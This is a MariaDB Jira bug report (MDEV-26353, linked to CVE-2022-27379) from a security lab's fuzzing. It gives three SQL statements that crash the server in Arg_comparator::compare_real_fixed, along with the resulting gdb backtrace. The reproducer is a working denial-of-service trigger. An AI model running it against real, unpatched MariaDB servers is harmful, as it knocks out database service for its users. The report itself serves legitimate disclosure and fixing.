[MDEV-26353] MariaDB server crash in Arg_comparator::compare_real_fixed - Jira

Details

Type: Bug
Status: Closed (View Workflow)
Priority: Major
Resolution: Duplicate
Affects Version/s: 10.6.2, 10.5.13, 10.2(EOL), 10.3(EOL), 10.4(EOL), 10.5, 10.6
Fix Version/s: N/A
Component/s: Data types
Labels:
None
Environment:
Linux x64

Description

Reported by:

Yaoguang Chen of Ant Security Light-Year Lab

Steps to reproduce:

CREATE TEMPORARY TABLE v0 ( v4 SMALLINT , v3 TINYINT , v2 NCHAR BINARY GENERATED ALWAYS AS ( NULL NOT IN ( 'x' SOUNDS LIKE UTC_TIME ( ) IS NULL IS NULL IS FALSE ) IS NOT FALSE ) , v1 INT ) ;

 SELECT CONVERT ( CHAR ( 'x' IS FALSE ) * DEFAULT ( v2 ) * 'x' * 62721821.000000 , DATETIME ) REGEXP v1 'x' FROM v0 ;

 INSERT IGNORE INTO v0 VALUES ( 78470821.000000 , 'x' , -32768 , v1 IN ( 'x' , FALSE NOT REGEXP v3 IS FALSE ) ) ;

backtrace:

Core was generated by `/home/supersix/fuzz/security/MariaDB/install_debug/bin/mysqld --defaults-file=/'.

Program terminated with signal SIGABRT, Aborted.

#0  __pthread_kill (threadid=<optimized out>, signo=signo@entry=0x6)

    at ../sysdeps/unix/sysv/linux/pthread_kill.c:56

56	../sysdeps/unix/sysv/linux/pthread_kill.c: No such file or directory.

[Current thread is 1 (Thread 0x7f8010296700 (LWP 1431325))]

gdb-peda$ bt

#0  __pthread_kill (threadid=<optimized out>, signo=signo@entry=0x6)

    at ../sysdeps/unix/sysv/linux/pthread_kill.c:56

#1  0x000055ceeec1e94f in my_write_core (sig=sig@entry=0x6)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/mysys/stacktrace.c:424

#2  0x000055ceee729d60 in handle_fatal_signal (sig=0x6)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/signal_handler.cc:344

#3  <signal handler called>

#4  __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50

#5  0x00007f8010d68859 in __GI_abort () at abort.c:79

#6  0x00007f801113f951 in ?? () from /lib/x86_64-linux-gnu/libstdc++.so.6

#7  0x00007f801114b47c in ?? () from /lib/x86_64-linux-gnu/libstdc++.so.6

#8  0x00007f801114b4e7 in std::terminate() () from /lib/x86_64-linux-gnu/libstdc++.so.6

#9  0x00007f801114c245 in __cxa_pure_virtual () from /lib/x86_64-linux-gnu/libstdc++.so.6

#10 0x000055ceee75d6ef in Arg_comparator::compare_real_fixed (this=0x7f7f88115bf0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item_cmpfunc.cc:897

#11 0x000055ceee76b464 in Arg_comparator::compare (this=0x7f7f88115bf0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item_cmpfunc.h:103

#12 Item_func_ne::val_int (this=0x7f7f88115b40)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item_cmpfunc.cc:1788

#13 0x000055ceee67b604 in Type_handler_int_result::Item_val_bool (this=<optimized out>,

    item=<optimized out>) at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_type.cc:5085

#14 0x000055ceee75de10 in Item_func_truth::val_bool (this=0x7f7f88115dc0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item_cmpfunc.cc:1165

#15 0x000055ceee75de81 in Item_func_truth::val_int (this=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item_cmpfunc.cc:1188

#16 0x000055ceee74f443 in Item::save_int_in_field (this=0x7f7f88115dc0, field=0x7f7f8801ac90,

    no_conversions=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item.cc:6700

#17 0x000055ceee7412a7 in Item::save_in_field (this=0x7f7f88115dc0, field=0x7f7f8801ac90,

    no_conversions=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item.cc:6710

#18 0x000055ceee5f87a0 in TABLE::update_virtual_fields (this=this@entry=0x7f7f8801a698,

    h=<optimized out>, update_mode=update_mode@entry=VCOL_UPDATE_FOR_WRITE)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/table.cc:8718

#19 0x000055ceee4ba3a5 in fill_record (thd=thd@entry=0x7f7f88000c58,

    table=table@entry=0x7f7f8801a698, ptr=0x7f7f8801aaf0, ptr@entry=0x7f7f8801aac8, values=...,

    ignore_errors=ignore_errors@entry=0x0, use_value=use_value@entry=0x0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_base.cc:8845

#20 0x000055ceee4ba444 in fill_record_n_invoke_before_triggers (thd=thd@entry=0x7f7f88000c58,

    table=table@entry=0x7f7f8801a698, ptr=0x7f7f8801aac8, values=...,

    ignore_errors=ignore_errors@entry=0x0, event=event@entry=TRG_EVENT_INSERT)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_base.cc:8888

#21 0x000055ceee4e6af6 in mysql_insert (thd=thd@entry=0x7f7f88000c58, table_list=<optimized out>,

    fields=..., values_list=..., update_fields=..., update_values=..., duplic=<optimized out>,

    ignore=<optimized out>, result=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_insert.cc:1047

#22 0x000055ceee5204e7 in mysql_execute_command (thd=0x7f7f88000c58,

    is_called_from_prepared_stmt=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_parse.cc:4568

#23 0x000055ceee510287 in mysql_parse (thd=0x7f7f88000c58, rawbuf=<optimized out>,

    length=<optimized out>, parser_state=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_parse.cc:8028

#24 0x000055ceee51c285 in dispatch_command (command=COM_QUERY, thd=0x7f7f88000c58,

    packet=<optimized out>, packet_length=<optimized out>, blocking=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_class.h:1340

#25 0x000055ceee51e1a8 in do_command (thd=0x7f7f88000c58, blocking=blocking@entry=0x1)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_parse.cc:1406

#26 0x000055ceee624317 in do_handle_one_connection (connect=<optimized out>, put_in_cache=0x1)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_connect.cc:1410

#27 0x000055ceee62467d in handle_one_connection (arg=arg@entry=0x55cef0328838)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql_connect.cc:1312

#28 0x000055ceee96097d in pfs_spawn_thread (arg=0x55cef06008d8)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/storage/perfschema/pfs.cc:2201

#29 0x00007f8011291609 in start_thread (arg=<optimized out>) at pthread_create.c:477

#30 0x00007f8010e65293 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95

Attachments

Issue Links

duplicates

MDEV-26437 Server crashes in Item_args::walk_args

Closed

links to

CVE-2022-27379

Activity

Transition	Time In Source Status	Execution Times

Alice Sherepa made transition - 2021-08-26 14:29

Open

Confirmed

13d 7h 18m

Nikita Malyavin made transition - 2021-10-01 19:19

Confirmed

Closed

36d 4h 49m

People

Assignee:: Nikita Malyavin

Reporter:: yaoguang

Votes:: 0 Vote for this issue

Watchers:: 4 Start watching this issue

Dates

Created:: 2021-08-13 07:10

Updated:: 2022-04-14 11:43

Resolved:: 2021-10-01 19:19

Git Integration

Error rendering 'com.xiplink.jira.git.jira_git_plugin:git-issue-webpanel'. Please contact your Jira administrators.

MariaDB Server